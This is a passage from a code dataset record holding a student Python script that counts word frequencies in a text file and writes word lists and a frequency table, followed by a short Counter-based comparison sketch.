character.isalpha():\n writeword+=character\n if not writeword:\n continue\n allwords.write(writeword+'\\n')\n if writeword in uniquedict:\n uniquedict[writeword]+=1\n else:\n uniquedict[writeword]=1\n unique.write(writeword+'\\n')\n \n \n \n valuelist=list(set(uniquedict.values()))\n valuelist.sort()\n\n\n for i in valuelist:\n count=0\n for key in uniquedict:\n if uniquedict[key]>=i:\n count+=1\n freq.write(str(i)+\": \"+ str(count)+'\\n')\n in_file.close()\n allwords.close()\n unique.close()\n freq.close()\nmain()\n","repo_name":"smitches/Group-1","sub_path":"group_1_assignment3/extract_words.py","file_name":"extract_words.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
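# --- sketch (not part of the record above) ---
# The extract_words.py record above builds its tallies with a hand-rolled dict;
# the standard-library Counter produces the same counts, shown here as a comparison
# sketch (the sample text is made up).
from collections import Counter

text = "It was the best of times, it was the worst of times"
words = [''.join(ch for ch in w.lower() if ch.isalpha()) for w in text.split()]
counts = Counter(w for w in words if w)  # skip words that were pure punctuation
assert counts['it'] == 2 and counts['was'] == 2 and counts['times'] == 2
# --- end sketch ---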